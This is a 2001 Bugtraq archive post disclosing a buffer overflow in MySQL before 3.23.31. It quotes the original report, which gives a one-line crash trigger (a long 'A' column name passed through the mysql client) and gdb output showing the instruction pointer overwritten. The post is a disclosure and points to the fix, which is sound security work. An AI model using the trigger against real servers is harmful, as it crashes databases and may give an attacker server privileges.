Home page logo

bugtraq logo Bugtraq mailing list archives

Buffer overflow in MySQL < 3.23.31
From: Nicolas GREGOIRE <nicolas.gregoire () 7THZONE COM>
Date: Thu, 18 Jan 2001 18:44:31 +0100


all versions of MySQL < 3.23.31 have a buffer-overflow which crashs the
server and which seems to be exploitable (ie. 4141414 in eip)

Problem :
An attacker could gain mysqld privileges (gaining access to all the

Requirements :
You need a valid login/password to exploit this

Solution :
Upgrade to 3.23.31

Proof-of-concept code :

Credits :
I'm not the discoverer of this bug
The first public report was made by tharbad () kaotik org via the MySQL
See the following mails for details


Here the original post to the MySQL mailing-list :

On Jan 12, Jo?o Gouveia wrote:

I believe i've found a problem in MySql. Here are some test's i've made in
3.22.27 x86( also tested on v3.22.32 - latest stable, although i didn't
debug it, just tested to see if crashes ).Confirmed up to latest 3.23

On one terminal:
spike:/var/mysql # /sbin/init.d/mysql start
Starting service MySQL.
Starting mysqld daemon with databases from /var/mysql
spike:/var/mysql #

On the other terminal:
jroberto () spike:~ > mysql -p -e 'select a.'`perl -e'printf("A"x130)'`'.b'
Enter password:

On the first terminal i got:
spike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 Segmentation fault
$ledir/mysqld --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR --skip-lockin
g "$@" >>$err_log 2>&1>
Number of processes running now: 0
mysqld restarted on  Fri Jan 12 07:10:54 WET 2001
mysqld daemon ended

gdb shows the following:
(gdb) run
Starting program: /usr/sbin/mysqld
[New Thread 16897 (manager thread)]
[New Thread 16891 (initial thread)]
[New Thread 16898]
/usr/sbin/mysqld: ready for connections
[New Thread 16916]
[Switching to Thread 16916]

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info all-registers
eax            0x1      1
ecx            0x68     104
edx            0x8166947        135686471
ebx            0x41414141       1094795585
esp            0xbf5ff408       0xbf5ff408
ebp            0x41414141       0x41414141
esi            0x41414141       1094795585
edi            0x0      0
eip            0x41414141       0x41414141
eflags         0x10246  66118
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x0      0

looks like a tipical overflow to me.
Please reply asap, at least to tell me i'me not seeing things. :-)>
Best regards,

Joao Gouveia aka Tharbad.

tharbad () kaotik org

Here the reponse to a email I send today to the MySQL list :

Sergei Golubchik (MySQL team) wrote :


On Jan 18, Nicolas GREGOIRE wrote:

Still not any info about the buffer-overflow discovered last week ?
Shouldn't be fixed at the beginning of the week ?

Please, dear MySQL team, give us info !!


Fixed in latest release (3.23.31).


Here an part of the 3.23.30 to 3.23.31 diff :

+Changes in release 3.23.31
+   * Fixed security bug in something (please upgrade if you are using a
+     earlier MySQL 3.23 version).

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]